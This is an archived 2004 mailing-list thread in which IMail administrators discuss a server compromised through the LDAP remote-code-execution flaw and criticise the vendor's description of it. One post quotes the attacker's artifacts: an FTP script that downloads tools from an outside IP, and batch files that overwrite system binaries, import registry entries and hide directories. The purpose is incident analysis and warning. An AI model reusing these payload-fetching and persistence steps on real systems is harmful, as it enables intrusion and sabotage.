More postings on Marc's problems with his server. -----Original Message----- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Marc Catuogno Sent: Friday, May 07, 2004 11:32 AM To: [EMAIL PROTECTED] Subject: RE: [IMail Forum] DAMN LDAP EXPLOIT! Take it seriously
It wasn't easy : ) There were many clues - the first was my hosting company alerting me to the fact there had been "too much activity" on port 389 during the change over. I thought this was simply the "denial of service" attack, so I made sure that I was patched and didn't think much more about it. Next some of the hidden files and logs that I found on the compromised machine were scanning for port 389 and logging IMAIL servers that responded. Also scanning out on 220 to 21 for DAMEWARE I believe. I found this in one file that allowed him to get files that he needed on my machine: (altered files with and "_" to get through filters) open 164.47.170.67 153 get exe get regsvc32.e_xe get regsvr32.d_ll get explorer.e_xe get sux.d_ll get sux.i_ni get jacheck.d_ll get jacheck.i_ni get ircu.d_ll get nsiislog.d_ll get e.b_at get crtdll.d_ll get matze.e_xe get scan.e_xe get hidden.e_xe get spoolsvc.e_xe get regsv.e_xe get go.b_at quit This was the contents of the e.b_at (batch file) @echo off cls cmd.e_xe /c regsvc32.e_xe -s cls ping -n 20 127.0.0.1 >NUL cls cmd.e_xe /c regsvc32.e_xe cls exit This in another file called secure.b_at (batch file)that was overwriting system files and adding registry entries: @echo off cls regedit /s c:\winnt\system32\c_md\root.r_eg regedit /s c:\winnt\system32\c_md\config.r_eg copy c:\winnt\system32\xcopy.e_xe c:\winnt\system32\cmd.e_xe copy c:\winnt\system32\xcopy.e_xe c:\winnt\system32\ftp.e_xe copy c:\winnt\system32\xcopy.e_xe c:\winnt\system32\tftp.e_xe copy c:\winnt\system32\xcopy.e_xe C:\winnt\system32\dllcache\cmd.e_xe copy c:\winnt\system32\xcopy.e_xe C:\winnt\system32\dllcache\tftp.e_xe copy c:\winnt\system32\xcopy.e_xe C:\winnt\system32\dllcache\ftp.e_xe attrib /S /D +H +R +S -A c:\winnt\system32\cmd attrib /S /D +H +R +S -A c:\inetpub\scripts\scripttmp c:\winnt\regedit.e_xe /s c:\winnt\system32\cmd\root.r_eg c:\winnt\regedit.e_xe /s c:\winnt\system32\cmd\config.r_eg exit And it goes on like this.... -----Original Message----- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Kevin Bilbee Sent: Friday, May 07, 2004 12:46 PM To: [EMAIL PROTECTED] Subject: RE: [IMail Forum] DAMN LDAP EXPLOIT! Take it seriously As a curiosity question, how did you determine that is was Imails LDAP that was the entry point into your server??? Kevin Bilbee > -----Original Message----- > From: [EMAIL PROTECTED] > [mailto:[EMAIL PROTECTED] Behalf Of Jay Sudowski - > Handy Networks, LLC > Sent: Friday, May 07, 2004 1:20 AM > To: [EMAIL PROTECTED] > Subject: RE: [IMail Forum] DAMN LDAP EXPLOIT! Take it seriously > > > Of course you didn't know. IPSwitch calls the vulnerability a denial of > service attack, when it's in fact a remote code execution attack. Any > remote code execution attack, especially against a service running in > the LocalSystem Context by default is going to be severe. > > In this day and age, it's down right negligent to be misinforming your > customers about security vulnerabilities. Yet, IPSwitch has no problem > calling this issue a "possible LDAP Denial of Service vulnerability", > which is just a flat out lie. It's a remote code execution > vulnerability with exploits in the wild. > > Ughs ... > > Jay Sudowski > > Director of Technical Operations > ----------------------------------------- > HANDY NETWORKS, LLC > Tel.: 1-877-70-HANDY Ext. 882 > Fax: 1-888-800-2FAX > http://www.HandyNetworks.com > ICQ 15601511 | AIM JaySuds > ---------------------------------------- > Specializing in Windows 2000 Hosting Solutions > Bulk Reseller Hosting / Managed Dedicated Services > Managed Dedicated Server Specials from $299 > > > > > -----Original Message----- > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] > Sent: Friday, May 07, 2004 12:42 AM > To: [EMAIL PROTECTED] > Subject: [IMail Forum] DAMN LDAP EXPLOIT! Take it seriously > > I had to move a box that is hosted for me offsite. I was on 7.15 so > installed it on the new box, then moved over my old IMAIL to the new > box. > Upgraded to 8.05 installed, Declude, anti-virus and so on and then > applied > HF3.... > I have been so badly hacked through the LDAP exploit that I have to move > to > a new box. He also used my box to scan and compromise other IMAIL > servers, > I have IPS of possible other hacked IMAIL machines (I'm tempted to post > them, but I will try to spend some time when I have it trying to figure > out > if I can contact these people - unless people feel I should post them) . > I > have spent over three days pouring through my box, pulling out installed > programs, batch files, registry entries and still this guy is running an > FTP > service on port 4022 that I can't find the program, service or files > that > are being uploaded and downloaded. The only thing that alerted me to > this > was the IPNT.NET tech calling me telling me about traffic spikes on my > box > at 2am. > > Virus scans found nothing, spyware scans found nothing. If doing a new > install of anything below 8.1 I STRONGLY suggest that you stop the LDAP > service immediately and PATCH!!! I had no idea that this exploit was so > bad. > > > --- > [This E-mail scanned for viruses by Declude Virus] > > > To Unsubscribe: http://www.ipswitch.com/support/mailing-lists.html > List Archive: > http://www.mail-archive.com/imail_forum%40list.ipswitch.com/ > Knowledge Base/FAQ: http://www.ipswitch.com/support/IMail/ > > > > To Unsubscribe: http://www.ipswitch.com/support/mailing-lists.html > List Archive: http://www.mail-archive.com/imail_forum%40list.ipswitch.com/ > Knowledge Base/FAQ: http://www.ipswitch.com/support/IMail/ > To Unsubscribe: http://www.ipswitch.com/support/mailing-lists.html List Archive: http://www.mail-archive.com/imail_forum%40list.ipswitch.com/ Knowledge Base/FAQ: http://www.ipswitch.com/support/IMail/ --- [This E-mail scanned for viruses by Declude Virus] --- [This E-mail scanned for viruses by Declude Virus] To Unsubscribe: http://www.ipswitch.com/support/mailing-lists.html List Archive: http://www.mail-archive.com/imail_forum%40list.ipswitch.com/ Knowledge Base/FAQ: http://www.ipswitch.com/support/IMail/ To Unsubscribe: http://www.ipswitch.com/support/mailing-lists.html List Archive: http://www.mail-archive.com/imail_forum%40list.ipswitch.com/ Knowledge Base/FAQ: http://www.ipswitch.com/support/IMail/
